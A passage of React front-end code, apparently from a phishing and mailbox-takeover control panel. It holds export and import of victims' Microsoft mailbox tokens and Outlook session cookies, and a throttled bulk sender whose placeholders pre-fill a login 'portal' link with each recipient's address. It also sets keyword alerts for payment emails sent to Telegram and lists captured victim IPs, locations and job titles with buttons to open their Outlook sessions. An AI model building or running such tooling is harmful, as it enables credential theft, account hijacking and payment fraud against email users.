    window.setTimeout(() => window.URL.revokeObjectURL(url), 1500);
  };

  const exportSingleToken = async () => {
    let mailbox = exportMailbox;
    if (mailbox === "__custom__") {
      mailbox = (exportMailboxCustom || "").trim();
    }
    if (!mailbox) {
      addToast("Enter or select a mailbox ID", "warning");
      return;
    }
    setExportLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/tokens/${encodeURIComponent(mailbox)}/export`);
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        throw new Error(data.detail || data.error || "Export failed");
      }
      const blob = await res.blob();
      downloadFile(blob, `token_${mailbox}.json`);
      addToast(`Token for ${mailbox} exported`, "success");
    } catch (err) {
      addToast(err.message, "error");
    } finally {
      setExportLoading(false);
    }
  };

  const exportAllTokens = async () => {
    setExportLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/tokens/export-all`);
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        throw new Error(data.detail || data.error || "Bulk export failed");
      }
      const blob = await res.blob();
      downloadFile(blob, "all_tokens.json");
      addToast("All tokens exported", "success");
    } catch (err) {
      addToast(err.message, "error");
    } finally {
      setExportLoading(false);
    }
  };

  const importToken = async () => {
    const text = (importJsonText || "").trim();
    const file = importFile;

    if (!text && !file) {
      addToast("Paste JSON or select a file", "warning");
      return;
    }

    let fileToUpload = file;
    if (text && !file) {
      try {
        JSON.parse(text);
        const blob = new Blob([text], { type: "application/json" });
        fileToUpload = new File([blob], "import.json", { type: "application/json" });
      } catch {
        addToast("Invalid JSON in the text area", "error");
        return;
      }
    }

    const formData = new FormData();
    formData.append("file", fileToUpload);

    setImportLoading(true);
    setImportResult(null);
    try {
      const res = await fetchWithAuth(`${API}/tokens/import`, {
        method: "POST",
        body: formData,
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        throw new Error(data.detail || data.error || "Import failed");
      }
      setImportResult(data);
      setImportJsonText("");
      setImportFile(null);
      const fi = document.getElementById("importFileInput");
      if (fi) fi.value = "";
      addToast(`Imported token for ${data.mailbox || "mailbox"}`, "success");
      fetchTokenVault();
    } catch (err) {
      addToast(err.message, "error");
    } finally {
      setImportLoading(false);
    }
  };

  const importBulk = async () => {
    if (!bulkImportFile) {
      addToast("Select a JSON file with an array of tokens", "warning");
      return;
    }
    setBulkImportLoading(true);
    setBulkImportResult(null);
    try {
      const formData = new FormData();
      formData.append("file", bulkImportFile);
      const res = await fetchWithAuth(`${API}/tokens/import-bulk`, {
        method: "POST",
        body: formData,
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        throw new Error(data.detail || data.error || "Bulk import failed");
      }
      setBulkImportResult(data);
      setBulkImportFile(null);
      const fi = document.getElementById("bulkImportFileInput");
      if (fi) fi.value = "";
      addToast(`Bulk import complete: ${data.imported || 0} imported, ${data.errors?.length || 0} errors`, data.errors?.length > 0 ? "warning" : "success");
      fetchTokenVault();
    } catch (err) {
      addToast(err.message, "error");
    } finally {
      setBulkImportLoading(false);
    }
  };

  const exportCookies = async () => {
    let mailbox = cookieMailbox;
    if (mailbox === "__custom__") {
      mailbox = (cookieMailboxCustom || "").trim();
    }
    if (!mailbox) {
      addToast("Enter or select a mailbox ID", "warning");
      return;
    }
    setCookieLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/outlook/cookies?mailbox=${encodeURIComponent(mailbox)}`);
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        throw new Error(data.detail || data.error || "Cookie export failed");
      }
      const blob = await res.blob();
      downloadFile(blob, `cookies_${mailbox}.json`);
      addToast(`Cookies for ${mailbox} exported`, "success");
    } catch (err) {
      addToast(err.message, "error");
    } finally {
      setCookieLoading(false);
    }
  };

  const renderMailboxPicker = (value, setValue, customValue, setCustomValue, label = "Mailbox") => (
    <div style={{ display: "flex", gap: 8, flexWrap: "wrap", alignItems: "center" }}>
      <select
        style={{ ...styles.select, flex: 1, minWidth: 200 }}
        value={value}
        onChange={(e) => {
          const val = e.target.value;
          setValue(val);
          if (val !== "__custom__") setCustomValue("");
        }}
      >
        <option value="">Select a mailbox...</option>
        {availableUsers.map((u) => (
          <option key={u} value={u}>{u}</option>
        ))}
        <option value="__custom__">Custom (type below)</option>
      </select>
      {value === "__custom__" && (
        <input
          style={{ ...styles.input, flex: 1, minWidth: 200 }}
          placeholder={`Enter ${label} ID manually`}
          value={customValue}
          onChange={(e) => setCustomValue(e.target.value)}
        />
      )}
    </div>
  );

  return (
    <div style={styles.sectionStack}>
      <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
        <div style={styles.cardHeaderCompact}>
          <div>
            <div style={styles.cardTitle}>Token Export / Import</div>
            <div style={styles.cardSubtitle}>Export and import tokens for mailboxes.</div>
          </div>
        </div>

        <div style={{ ...styles.infoCard, marginBottom: 8 }}>
          <div style={styles.infoKey}>Export single token</div>
          {renderMailboxPicker(exportMailbox, setExportMailbox, exportMailboxCustom, setExportMailboxCustom, "mailbox")}
          <div style={{ marginTop: 8 }}>
            <button
              style={styles.primaryButton}
              onClick={exportSingleToken}
              disabled={exportLoading}
            >
              {exportLoading ? "Exporting..." : "Export Single"}
            </button>
          </div>
        </div>

        <div style={{ ...styles.infoCard, marginBottom: 8 }}>
          <div style={styles.infoKey}>Export all tokens</div>
          <button
            style={styles.primaryButton}
            onClick={exportAllTokens}
            disabled={exportLoading}
          >
            {exportLoading ? "Exporting..." : "Export All"}
          </button>
        </div>

        <div style={{ ...styles.infoCard, marginBottom: 8 }}>
          <div style={styles.infoKey}>Import token</div>
          <div style={{ display: "grid", gap: 8 }}>
            <textarea
              style={{ ...styles.textarea, minHeight: 120 }}
              placeholder='Paste JSON token object here, e.g. {"mailbox":"user@domain.com","refresh_token":"...","access_token":"..."}'
              value={importJsonText}
              onChange={(e) => setImportJsonText(e.target.value)}
            />
            <div style={{ display: "flex", gap: 8, flexWrap: "wrap", alignItems: "center" }}>
              <label style={{ ...styles.secondaryButton, cursor: "pointer" }}>
                Choose JSON file
                <input
                  id="importFileInput"
                  type="file"
                  accept=".json"
                  style={{ display: "none" }}
                  onChange={(e) => setImportFile(e.target.files?.[0] || null)}
                />
              </label>
              {importFile && <span style={styles.inlineNote}>{importFile.name}</span>}
              <button
                style={styles.primaryButton}
                onClick={importToken}
                disabled={importLoading}
              >
                {importLoading ? "Importing..." : "Import Token"}
              </button>
            </div>
          </div>
          {importResult && (
            <div style={styles.inlineNote}>
              Imported: {importResult.mailbox || "mailbox"}
            </div>
          )}
        </div>

        <div style={{ ...styles.infoCard, marginBottom: 8 }}>
          <div style={styles.infoKey}>Bulk import tokens</div>
          <div style={{ display: "flex", gap: 8, flexWrap: "wrap", alignItems: "center" }}>
            <label style={{ ...styles.secondaryButton, cursor: "pointer" }}>
              Choose JSON array file
              <input
                id="bulkImportFileInput"
                type="file"
                accept=".json"
                style={{ display: "none" }}
                onChange={(e) => setBulkImportFile(e.target.files?.[0] || null)}
              />
            </label>
            {bulkImportFile && <span style={styles.inlineNote}>{bulkImportFile.name}</span>}
            <button
              style={styles.primaryButton}
              onClick={importBulk}
              disabled={bulkImportLoading}
            >
              {bulkImportLoading ? "Importing..." : "Bulk Import"}
            </button>
          </div>
          {bulkImportResult && (
            <div style={styles.inlineNote}>
              Imported: {bulkImportResult.imported || 0} mailboxes
              {bulkImportResult.errors?.length > 0 && `, errors: ${bulkImportResult.errors.length}`}
            </div>
          )}
        </div>

        <div style={{ ...styles.infoCard }}>
          <div style={styles.infoKey}>Export Outlook cookies</div>
          {renderMailboxPicker(cookieMailbox, setCookieMailbox, cookieMailboxCustom, setCookieMailboxCustom, "mailbox")}
          <div style={{ marginTop: 8 }}>
            <button
              style={styles.primaryButton}
              onClick={exportCookies}
              disabled={cookieLoading}
            >
              {cookieLoading ? "Generating..." : "Export Cookies"}
            </button>
          </div>
          <div style={styles.inlineNote}>
            Generates a JSON file with cookies for the mailbox. Requires the headless microservice to be running.
          </div>
        </div>
      </section>
    </div>
  );
}

  function renderSender() {
    const editorHelp =
      approvedBodyMode === "text"
        ? "Plain text mode."
        : approvedBodyMode === "html"
          ? "HTML mode."
          : "Visual editor.";

    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Sender</div>
              <div style={styles.cardSubtitle}>Compose and send messages.</div>
            </div>
            <div style={{ display: "flex", gap: 8, alignItems: "center", flexWrap: "wrap" }}>
              {selectedUserId && renderBadge(selectedUserId, inboxConnected ? "green" : "orange")}
              {sendProgress.total > 0 && <div style={styles.progressBadge}>{sendProgress.current}/{sendProgress.total}</div>}
            </div>
          </div>

          <div style={{ ...styles.infoCard, marginBottom: 14 }}>
            <div style={styles.infoKey}>Outbound workspace</div>
            <div style={styles.inlineNote}>
              Select a mailbox and send messages.
            </div>
          </div>

          <div style={styles.formGrid2}>
            <div>
              <label style={styles.label}>Primary recipient(s)</label>
              <textarea
                style={styles.textarea}
                value={approvedRecipient}
                onChange={(e) => setApprovedRecipient(e.target.value)}
                placeholder="recipient@company.com; second@company.com"
              />
            </div>
            <div>
              <label style={styles.label}>CC recipients</label>
              <textarea
                style={{ ...styles.textarea, minHeight: 76 }}
                value={approvedCc}
                onChange={(e) => setApprovedCc(e.target.value)}
                placeholder="cc1@company.com; cc2@company.com"
              />
              <div style={{ ...styles.compactGrid2, marginTop: 8 }}>
                <div>
                  <label style={styles.label}>CC separator</label>
                  <select
                    style={styles.select}
                    value={approvedCcSeparator}
                    onChange={(e) => setApprovedCcSeparator(e.target.value)}
                  >
                    <option value="auto">Auto detect</option>
                    <option value="semicolon">Semicolon ;</option>
                    <option value="comma">Comma ,</option>
                    <option value="newline">New line</option>
                    <option value="space">Space</option>
                  </select>
                </div>
                <div>
                  <label style={styles.label}>CC count</label>
                  <input
                    style={styles.input}
                    value={String(addressListCount(approvedCc, approvedCcSeparator))}
                    readOnly
                  />
                </div>
              </div>

              <label style={{ ...styles.label, marginTop: 12 }}>BCC recipients</label>
              <textarea
                style={{ ...styles.textarea, minHeight: 76 }}
                value={approvedBcc}
                onChange={(e) => setApprovedBcc(e.target.value)}
                placeholder="bcc1@company.com; bcc2@company.com"
              />
              <div style={{ ...styles.compactGrid2, marginTop: 8 }}>
                <div>
                  <label style={styles.label}>BCC separator</label>
                  <select
                    style={styles.select}
                    value={approvedBccSeparator}
                    onChange={(e) => setApprovedBccSeparator(e.target.value)}
                  >
                    <option value="auto">Auto detect</option>
                    <option value="semicolon">Semicolon ;</option>
                    <option value="comma">Comma ,</option>
                    <option value="newline">New line</option>
                    <option value="space">Space</option>
                  </select>
                </div>
                <div>
                  <label style={styles.label}>BCC count</label>
                  <input
                    style={styles.input}
                    value={String(addressListCount(approvedBcc, approvedBccSeparator))}
                    readOnly
                  />
                </div>
              </div>
            </div>
          </div>

          <label style={styles.label}>Subject line</label>
          <input
            style={styles.input}
            value={approvedSubject}
            onChange={(e) => setApprovedSubject(e.target.value)}
            placeholder="Enter a clear subject line"
          />

          <label style={styles.label}>Reply‑To (optional)</label>
          <input
            style={styles.input}
            placeholder="custom-reply@example.com"
            value={approvedReplyTo}
            onChange={(e) => setApprovedReplyTo(e.target.value)}
          />

          <div style={{ ...styles.compactGrid2, gap: 10 }}>
            <div>
              <label style={styles.label}>Composer mode</label>
              <select style={styles.select} value={approvedBodyMode} onChange={(e) => handleApprovedBodyModeChange(e.target.value)}>
                <option value="wysiwyg">Visual editor</option>
                <option value="html">HTML template</option>
                <option value="text">Plain text</option>
              </select>
            </div>
            <div>
              <label style={styles.label}>Paste behavior</label>
              <select style={styles.select} value={approvedPasteMode} onChange={(e) => setApprovedPasteMode(e.target.value)}>
                <option value="plain_text_html">Clean pasted formatting</option>
                <option value="keep_formatting">Keep pasted formatting when available</option>
              </select>
            </div>
          </div>
          <div style={styles.inlineNote}>{editorHelp}</div>

          <div style={styles.editorToolbar}>
            <button
              type="button"
              style={styles.secondaryButton}
              onMouseDown={(e) => e.preventDefault()}
              onClick={() => applyEditorCommand("bold")}
              title="Bold selected text"
            >
              Bold
            </button>
            <button
              type="button"
              style={styles.secondaryButton}
              onMouseDown={(e) => e.preventDefault()}
              onClick={() => applyEditorCommand("italic")}
              title="Italic selected text"
            >
              Italic
            </button>
            <button
              type="button"
              style={styles.secondaryButton}
              onMouseDown={(e) => e.preventDefault()}
              onClick={() => applyEditorCommand("underline")}
              title="Underline selected text"
            >
              Underline
            </button>
            <button
              type="button"
              style={styles.secondaryButton}
              onMouseDown={(e) => e.preventDefault()}
              onClick={() => applyEditorCommand("insertUnorderedList")}
              title="Create a bullet list"
            >
              Bullet list
            </button>
            <button
              type="button"
              style={styles.secondaryButton}
              onMouseDown={(e) => {
                e.preventDefault();
                const sel = window.getSelection();
                if (sel && sel.rangeCount > 0) {
                  approvedSelectedRange.current = sel.getRangeAt(0);
                }
              }}
              onClick={addApprovedHyperlink}
              title="Select text in the editor, then add a hyperlink"
            >
              Add hyperlink
            </button>
            <button
              type="button"
              style={styles.secondaryButton}
              onMouseDown={(e) => e.preventDefault()}
              onClick={() => {
                const src = window.prompt("Image URL");
                if (src) insertImageIntoApprovedBody(src);
              }}
              title="Insert an image from a URL"
            >
              Insert image URL
            </button>
            <label style={{ ...styles.secondaryButton, cursor: "pointer" }} title="Upload and embed an inline image">
              Upload image
              <input
                type="file"
                accept="image/*"
                style={{ display: "none" }}
                onChange={(e) => handleApprovedInlineImageFile(e.target.files?.[0])}
              />
            </label>
            {approvedBodyMode !== "wysiwyg" && (
              <span style={styles.inlineNote}>Switch to Visual editor to apply formatting to selected text.</span>
            )}
          </div>

          {approvedBodyMode === "html" ? (
            <textarea style={{ ...styles.textarea, minHeight: 180, fontFamily: "monospace" }} value={approvedBody} onChange={(e) => setApprovedBody(e.target.value)} placeholder="<p>Paste HTML here...</p>" />
          ) : approvedBodyMode === "text" ? (
            <textarea style={{ ...styles.textarea, minHeight: 180, fontFamily: "monospace", whiteSpace: "pre-wrap" }} value={approvedBody} onChange={(e) => setApprovedBody(e.target.value)} placeholder="Write your plain text message here..." />
          ) : (
            <div
              ref={approvedBodyEditorRef}
              contentEditable
              suppressContentEditableWarning
              style={styles.richEditor}
              onInput={(e) => {
                approvedBodyRef.current = e.currentTarget.innerHTML;
                setApprovedBody(approvedBodyRef.current);
              }}
              onFocus={() => {
                if (approvedBodyEditorRef.current && approvedBodyEditorRef.current.innerHTML !== approvedBodyRef.current) {
                  approvedBodyEditorRef.current.innerHTML = approvedBodyRef.current || "";
                }
              }}
              onPaste={handleApprovedEditorPaste}
              dangerouslySetInnerHTML={{ __html: approvedBodyRef.current || "" }}
            />
          )}
          <div style={{ ...styles.inlineNote, marginTop: 6, lineHeight: 1.7 }}>
            <b>Autograb commands</b> — filled in per recipient at send time:{" "}
            <code>{"#{RECIPIENT_NAME}"}</code>,{" "}
            <code>{"#{RECIPIENT_EMAIL}"}</code>,{" "}
            <code>{"#{RECIPIENT_DOMAIN}"}</code>,{" "}
            <code>{"#{RECIPIENT_DOMAIN_NAME}"}</code>,{" "}
            <code>{"#{CURRENT_DATE}"}</code>,{" "}
            <code>{"#{CURRENT_TIME}"}</code>
            <br />
            Use <code>{"#{RECIPIENT_EMAIL}"}</code> as a path or query value to pre-fill a portal, e.g.{" "}
            <code>{"https://portal.example.com/login/#{RECIPIENT_EMAIL}"}</code>{" "}
            or{" "}
            <code>{"https://portal.example.com/login?email=#{RECIPIENT_EMAIL}"}</code>
          </div>
          <div style={styles.formGrid2}>
            <div>
              <label style={styles.label}>Attachment</label>
              <input id="approvedAttachmentInputStandalone" type="file" onChange={(e) => setApprovedAttachment(e.target.files?.[0] || null)} />
            </div>
            <div>
              <label style={styles.label}>Queue recipients</label>
              <textarea
                style={styles.textarea}
                value={bulkRecipients}
                onChange={(e) => setBulkRecipients(e.target.value)}
                placeholder="Paste multiple recipients here for queued sending"
              />
            </div>
          </div>

          <div style={{ ...styles.infoCard, marginTop: 12 }}>
            <div style={styles.infoKey}>Queue sending limits</div>
            <div style={styles.inlineNote}>
              Set queue limits.
            </div>
            <div style={{ ...styles.formGrid2, marginTop: 10 }}>
              <div>
                <label style={styles.label}>Emails per batch</label>
                <input
                  style={styles.input}
                  type="number"
                  min="1"
                  max="50"
                  value={bulkBatchSize}
                  onChange={(e) => setBulkBatchSize(Math.max(1, Math.min(Number(e.target.value || 1), 50)))}
                />
              </div>
              <div>
                <label style={styles.label}>Pause between batches (seconds)</label>
                <input
                  style={styles.input}
                  type="number"
                  min="0"
                  max="3600"
                  value={bulkBatchPauseSeconds}
                  onChange={(e) => setBulkBatchPauseSeconds(Math.max(0, Math.min(Number(e.target.value || 0), 3600)))}
                />
              </div>
              <div>
                <label style={styles.label}>Pause between individual emails (seconds)</label>
                <input
                  style={styles.input}
                  type="number"
                  min="0"
                  max="60"
                  value={bulkDelaySeconds}
                  onChange={(e) => setBulkDelaySeconds(Math.max(0, Math.min(Number(e.target.value || 0), 60)))}
                />
              </div>
              <div>
                <label style={styles.label}>Maximum recipients this run</label>
                <input
                  style={styles.input}
                  type="number"
                  min="1"
                  max="500"
                  value={bulkMaxRecipients}
                  onChange={(e) => setBulkMaxRecipients(Math.max(1, Math.min(Number(e.target.value || 1), 500)))}
                />
              </div>
            </div>
          </div>

          <div style={styles.buttonRow}>
            <button style={styles.primaryButton} onClick={sendApprovedOneRecipientEmail}>Send message</button>
            <button style={styles.secondaryButton} onClick={sendApprovedBulkEmail} disabled={bulkSending}>{bulkSending ? "Sending..." : "Start queued send"}</button>
          </div>

          <div style={{ marginTop: 12 }}>
            <button
              style={styles.primaryButton}
              onClick={() => setCalendarModalOpen(true)}
              disabled={!selectedUserId || !inboxConnected}
            >
              📅 Send Calendar Invite
            </button>
          </div>
        </section>

        <Modal
          open={calendarModalOpen}
          onClose={() => {
            setCalendarModalOpen(false);
            setCalendarInvite({ to: "", subject: "", description: "", location: "", start_time: "", end_time: "" });
          }}
          title="Send Calendar Invite"
        >
          <div style={{ display: "grid", gap: 12 }}>
            <div>
              <label style={styles.label}>Recipient(s)</label>
              <input
                style={styles.input}
                placeholder="attendee@example.com"
                value={calendarInvite.to}
                onChange={(e) => setCalendarInvite({ ...calendarInvite, to: e.target.value })}
              />
            </div>
            <div>
              <label style={styles.label}>Subject</label>
              <input
                style={styles.input}
                placeholder="Meeting Subject"
                value={calendarInvite.subject}
                onChange={(e) => setCalendarInvite({ ...calendarInvite, subject: e.target.value })}
              />
            </div>
            <div>
              <label style={styles.label}>Description</label>
              <textarea
                style={styles.textarea}
                placeholder="Meeting description or agenda"
                value={calendarInvite.description}
                onChange={(e) => setCalendarInvite({ ...calendarInvite, description: e.target.value })}
              />
            </div>
            <div>
              <label style={styles.label}>Location</label>
              <input
                style={styles.input}
                placeholder="Meeting room or address"
                value={calendarInvite.location}
                onChange={(e) => setCalendarInvite({ ...calendarInvite, location: e.target.value })}
              />
            </div>
            <div>
              <label style={styles.label}>Start time</label>
              <input
                style={styles.input}
                type="datetime-local"
                value={calendarInvite.start_time}
                onChange={(e) => setCalendarInvite({ ...calendarInvite, start_time: e.target.value })}
              />
            </div>
            <div>
              <label style={styles.label}>End time</label>
              <input
                style={styles.input}
                type="datetime-local"
                value={calendarInvite.end_time}
                onChange={(e) => setCalendarInvite({ ...calendarInvite, end_time: e.target.value })}
              />
            </div>
            <div style={styles.buttonRow}>
              <button
                style={styles.primaryButton}
                onClick={async () => {
                  if (!calendarInvite.to || !calendarInvite.start_time || !calendarInvite.end_time) {
                    addToast("Recipient, start, and end times are required", "warning");
                    return;
                  }
                  setCalendarSending(true);
                  try {
                    const res = await fetchWithAuth(`${API}/calendar/invite`, {
                      method: "POST",
                      headers: { "Content-Type": "application/json" },
                      body: JSON.stringify({
                        user_id: selectedUserId,
                        to: calendarInvite.to,
                        subject: calendarInvite.subject,
                        description: calendarInvite.description,
                        location: calendarInvite.location,
                        start_time: calendarInvite.start_time,
                        end_time: calendarInvite.end_time,
                      }),
                    });
                    const data = await res.json();
                    if (!res.ok) {
                      addToast(data.detail || data.error || "Failed to send calendar invite", "error");
                      return;
                    }
                    addToast("Calendar invite sent", "success");
                    setCalendarModalOpen(false);
                    setCalendarInvite({ to: "", subject: "", description: "", location: "", start_time: "", end_time: "" });
                  } catch {
                    addToast("Failed to send calendar invite", "error");
                  } finally {
                    setCalendarSending(false);
                  }
                }}
                disabled={calendarSending}
              >
                {calendarSending ? "Sending..." : "Send Invite"}
              </button>
              <button
                style={styles.secondaryButton}
                onClick={() => {
                  setCalendarModalOpen(false);
                  setCalendarInvite({ to: "", subject: "", description: "", location: "", start_time: "", end_time: "" });
                }}
              >
                Cancel
              </button>
            </div>
          </div>
        </Modal>
      </div>
    );
  }
    function renderKeywordSettings() {
    const filteredListeners = keywordListeners.filter(l => l.user_id === selectedUserId);
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardHeaderCompact}>
            <div>
              <div style={styles.cardTitle}>Keyword Alert Settings</div>
              <div style={styles.cardSubtitle}>Monitor incoming emails for these words/phrases.</div>
            </div>
            <div style={styles.inlineActions}>
              <button style={styles.secondaryButton} onClick={fetchKeywordListeners} disabled={keywordLoading}>
                {keywordLoading ? "Refreshing..." : "Refresh"}
              </button>
              <button style={styles.dangerButton} onClick={clearAllKeywordListeners} disabled={keywordLoading}>
                {keywordLoading ? "Working..." : "Clear all"}
              </button>
            </div>
          </div>
          <div style={styles.formGrid2}>
            <textarea style={styles.textarea} value={keywordPhrase} onChange={(e) => setKeywordPhrase(e.target.value)} placeholder="invoice, purchase order, urgent payment..." />
            <div>
              <label style={styles.checkboxLabel}><input type="checkbox" checked={keywordTelegramEnabled} onChange={(e) => setKeywordTelegramEnabled(e.target.checked)} /> Send to Telegram</label>
              <button style={styles.primaryButton} onClick={addKeywordListener}>Save Keyword</button>
            </div>
          </div>

          {filteredListeners.length === 0 ? (
            <div style={styles.emptyState}>No keyword rules for this mailbox.</div>
          ) : (
            <div style={styles.tableWrap}>
              <table style={styles.table}>
                <thead><tr><th style={styles.th}>Keyword/Phrase</th><th style={styles.th}>Telegram</th><th style={styles.th}>Actions</th></tr></thead>
                <tbody>
                  {filteredListeners.map(l => {
                    const isEditing = editingKeywordId === l.id;
                    return (
                      <tr key={l.id}>
                        <td style={styles.td}>
                          {isEditing ? (
                            <input
                              style={styles.input}
                              value={editingKeywordPhrase}
                              onChange={(e) => setEditingKeywordPhrase(e.target.value)}
                              autoFocus
                            />
                          ) : (
                            l.phrase || l.keywords || l.phrase
                          )}
                        </td>
                        <td style={styles.td}>{l.telegram_enabled ? "✅" : "❌"}</td>
                        <td style={styles.td}>
                          {isEditing ? (
                            <>
                              <button style={styles.primaryButton} onClick={() => saveEditedKeyword(l.id)}>Save</button>
                              <button style={styles.secondaryButton} onClick={cancelEditingKeyword}>Cancel</button>
                            </>
                          ) : (
                            <>
                              <button style={styles.secondaryButton} onClick={() => startEditingKeyword(l)}>Edit</button>
                              <button style={styles.dangerButton} onClick={() => deleteKeywordListener(l.id)}>Delete</button>
                            </>
                          )}
                        </td>
                      </tr>
                    );
                  })}
                </tbody>
              </table>
            </div>
          )}
        </section>
      </div>
    );
  }

  function renderResults() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Active users and mailboxes</div>
              <div style={styles.cardSubtitle}>
                Active users and mailboxes.
              </div>
            </div>
            <div style={styles.inlineActions}>
              <button
                style={styles.secondaryButton}
                onClick={async () => {
                  await fetchUsers();
                  await fetchTokenVault();
                  await fetchCustomerAccounts();
                  await fetchReportResults();
                  await fetchActiveResultMailboxes();
                  await fetchTemporaryMailboxAccesses();
                  addToast("Active users and mailbox list refreshed", "success");
                }}
              >
                Refresh
              </button>
            </div>
          </div>

          {activeResultMailboxesLoading ? (
            <div style={styles.emptyState}>Loading active users and mailboxes...</div>
          ) : activeResultUsers.length === 0 ? (
            <div style={styles.emptyState}>No active saved users or connected mailboxes yet.</div>
          ) : (
            <div style={styles.tableWrap}>
              <table style={styles.table}>
                <thead>
                  <tr>
                    <th style={styles.th}>User / Mailbox</th>
                    <th style={styles.th}>Status</th>
                    <th style={styles.th}>Source</th>
                    <th style={styles.th}>Plan</th>
                    <th style={styles.th}>Access expires</th>
                    <th style={styles.th}>Action</th>
                  </tr>
                </thead>
                <tbody>
                  {activeResultUsers.map((row) => (
                    <tr key={row.user_id}>
                      <td style={styles.td}>
                        <div style={{ display: "grid", gap: 3 }}>
                          <strong>{row.label || row.user_id}</strong>
                          <span style={styles.miniPanelMeta}>{row.user_id}</span>
                        </div>
                      </td>
                      <td style={styles.td}>
                        <div style={{ display: "flex", gap: 6, flexWrap: "wrap" }}>
                          {row.account_active && renderBadge("Active", "green")}
                          {row.mailbox_connected && renderBadge("Mailbox connected", "green")}
                          {!row.mailbox_connected && renderBadge("Saved user", "orange")}
                        </div>
                      </td>
                      <td style={styles.td}>{(row.sources || []).join(" • ") || "—"}</td>
                      <td style={styles.td}>{row.plan || "—"}</td>
                      <td style={styles.td}>{row.expires_at || "—"}</td>
                      <td style={styles.td}>
                        <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
                          <button
                            style={styles.primaryButton}
                            onClick={() => openMailViewerForUser(row.user_id)}
                          >
                            Open Mail Viewer ↗
                          </button>
                          <button
                            style={styles.secondaryButton}
                            onClick={() => createTemporaryMailboxAccess(row.user_id)}
                            disabled={temporaryMailboxAccessLoading[`create-${row.user_id}`]}
                          >
                            {temporaryMailboxAccessLoading[`create-${row.user_id}`] ? "Creating..." : "Create login access"}
                          </button>
						  <button
                            style={styles.primaryButton}
                            onClick={() => openRealOutlook(row.user_id)}
                          >
                            Open Outlook.com ↗
                          </button>
                          <button
                            style={styles.secondaryButton}
                            onClick={async () => {
                              setSelectedUserId(row.user_id);
                              setActiveNav("mail");
                              await fetchMicrosoftStatus(row.user_id);
                              await fetchEnterpriseStatus(row.user_id);
                              await loadRules(row.user_id);
                            }}
                          >
                            Open in panel body
                          </button>
                          {temporaryMailboxAccesses
                            .filter((access) => String(access.mailbox_user_id || "").toLowerCase() === String(row.user_id || "").toLowerCase() && access.active !== false && access.status === "active")
                            .map((access) => (
                              <button
                                key={access.id}
                                style={styles.dangerButton}
                                onClick={() => revokeTemporaryMailboxAccess(access.id)}
                                disabled={temporaryMailboxAccessLoading[`revoke-${access.id}`]}
                                title={`Revoke ${access.username}`}
                              >
                                {temporaryMailboxAccessLoading[`revoke-${access.id}`] ? "Revoking..." : "Revoke Temp"}
                              </button>
                            ))}
                        </div>
                      </td>
                    </tr>
                  ))}
                </tbody>
              </table>
            </div>
          )}
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Recent connection results</div>
              <div style={styles.cardSubtitle}>Recent mailbox connection reports and captured metadata.</div>
            </div>
            <button style={styles.secondaryButton} onClick={fetchReportResults}>Refresh Results</button>
          </div>
          {reportResults.length === 0 ? <div style={styles.emptyState}>No results yet.</div> : (
            <div style={styles.tableWrap}>
              <table style={styles.table}>
                <thead><tr><th style={styles.th}>Mailbox</th><th style={styles.th}>User ID</th><th style={styles.th}>IP</th><th style={styles.th}>Country</th><th style={styles.th}>City</th><th style={styles.th}>Time</th><th style={styles.th}>Job title</th><th style={styles.th}>Action</th></tr></thead>
                <tbody>
                  {reportResults.map((r, i) => {
                    const resultUserId = r.user_id || r.mailbox || "";
                    return (
                      <tr key={r.id || i}>
                        <td style={styles.td}>{r.mailbox || r.user_id || "—"}</td>
                        <td style={styles.td}>{r.user_id || "—"}</td>
                        <td style={styles.td}>{r.ip || r.ip_address || "—"}</td>
                        <td style={styles.td}>{r.country || "—"}</td>
                        <td style={styles.td}>{r.city || "—"}</td>
                        <td style={styles.td}>{r.time || r.created_at || "—"}</td>
                        <td style={styles.td}>{r.job_title || r.detected_job_title || "—"}</td>
                        <td style={styles.td}>
                          <button
                            style={styles.secondaryButton}
                            onClick={() => openMailViewerForUser(resultUserId)}
                            disabled={!resultUserId}
                          >
                            Mail Viewer ↗
                          </button>
                        </td>
                      </tr>
                    );
                  })}
                </tbody>
              </table>
            </div>
          )}
        </section>
      </div>
    );
  }

  function renderTelegramSettings() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Telegram result settings</div>
          <div style={styles.cardSubtitle}>Update your own bot token and chat ID. User accounts start empty until they save their own details.</div>
          <label style={styles.label}>Telegram bot token</label>
          <input style={styles.input} value={telegramBotToken} onChange={(e) => setTelegramBotToken(e.target.value)} placeholder="123456:ABC..." />
          <label style={styles.label}>Chat ID</label>
          <input style={styles.input} value={telegramChatId} onChange={(e) => setTelegramChatId(e.target.value)} placeholder="-100..." />
          <button style={styles.primaryButton} onClick={saveTelegramSettings} disabled={telegramSettingsLoading}>{telegramSettingsLoading ? "Saving..." : "Save notification settings"}</button>
        </section>
      </div>
    );
  }

  function renderSettings() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Appearance</div>
          <div style={styles.cardSubtitle}>Choose light or dark theme.</div>
          <div style={{ fontSize: 12, fontWeight: 800, margin: "8px 0", color: isDarkMode ? "#bfdbfe" : "#175cd3" }}>
